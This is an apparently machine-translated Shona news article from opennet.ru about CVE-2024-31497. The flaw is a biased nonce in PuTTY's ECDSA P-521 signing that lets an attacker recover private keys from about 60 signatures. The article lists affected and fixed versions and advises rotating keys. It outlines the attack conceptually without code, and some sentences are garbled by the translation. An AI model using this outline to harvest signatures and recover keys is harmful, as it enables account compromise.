MuPuTTY, mutengi weSSH protocol anozivikanwa papuratifomu WindowsPane njodzi ine njodzi (CVE-2024-31497) yakawanikwa inobvumira kudzoserwa kwekiyi yakavanzika yemushandisi yakagadzirwa uchishandisa NIST P-521 elliptic curve ECDSA algorithm (ecdsa-sha2-nistp521). Kuti uvhure kiyi yakavanzika, zvakakwana kuongorora masiginecha edhijitari angangoita makumi matanhatu akagadzirwa nekiyi yakakanganiswa.
Kusagadzikana kunoonekwa kutanga kubva mushanduro yePuTTY 0.68 uye zvakare kunokanganisa zvigadzirwa zvinosanganisira vhezheni dzisina njodzi dzePuTTY, semuenzaniso, FileZilla (3.24.1 - 3.66.5), WinSCP (5.9.5 - 6.3.2), TortoiseGit (2.4.0.2 - 2.15.0) uye TortoiseSVN (1.10.0 - 1.14.6). Dambudziko rakagadziriswa muPuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 uye TortoiseGit 2.15.0.1 updates. Mushure mekuisa iyo yekuvandudza, vashandisi vanorayirwa kuti vagadzire makiyi matsva uye kubvisa ekare makiyi eruzhinji kubva kune avo emvumo_makiyi mafaera.
Kusagadzikana kunokonzerwa nekusava nehanya kwevagadziri, avo vakashandisa yekutanga vector (nonce) zvichibva pane 521-bit random sequence kugadzira 512-bit kiyi, pamwe vachitenda kuti entropy ye512 bits yaizokwana uye yasara 9 bits. hazvina kukosha. Nekuda kweizvozvo, mumakiyi ese epachivande akagadzirwa muPuTTY uchishandisa ecdsa-sha2-nistp521 algorithm, yekutanga 9 mabhiti ekutanga vector aigara achitora zero kukosha.
Kune ECDSA neDSA, kunaka kweiyo pseudorandom nhamba jenareta uye kufukidzwa kwakazara kweparameter inoshandiswa mukuverenga modulus nechero data data kwakakosha, sezvo kutsunga kwechero mabheti mashoma ane ruzivo nezve yekutanga vector yakakwana kutakura. kunze kurwiswa kudzoreredza sequentially kiyi yese yakavanzika. Kuti ubudirire kudzoreredza kiyi, zvinokwana kuve nekiyi yeruzhinji uye kuongorora akati wandei madhijitari siginecha anogadzirwa uchishandisa dambudziko kiyi yedata inozivikanwa kune anorwisa. Kurwiswa kunouya pakugadzirisa HNP (Yakavanzika Nhamba Dambudziko) dambudziko.
Iwo anodiwa masiginecha edhijitari anogona kuwanikwa, semuenzaniso, kana mushandisi akabatana neanorwisa SSH server kana kune Git server inoshandisa SSH sekutakura. Masiginicha anodiwa pakurwiswa anogonawo kuwanikwa kana kiyi yakashandiswa kuonesa data risingawirirani, semuenzaniso, git inoita kana uchishandisa iyo Pageant SSH mumiriri kuendesa traffic kune anomugadziri. Kuwana iyo data inodiwa kuti udzore kiyi panguva yekurwiswa kweMITM hazvigoneke, sezvo masiginecha muSSH asina kufambiswa mumavara akajeka.
Zvinocherechedzwa kuti kushandiswa kwakafanana kweasina kukwana ekutanga mavheji akashandiswa muPuTTY kune mamwe marudzi eelliptic curves, asi kune algorithms kunze kweECDSA P-521, kuburitswa kweruzivo kunokonzeresa hakuna kukwana kuita kurwisa kiyi yekudzoreredza. ECDSA makiyi emamwe saizi uye Ed25519 makiyi haatarisi kurwisa.
Source: opennet.ru
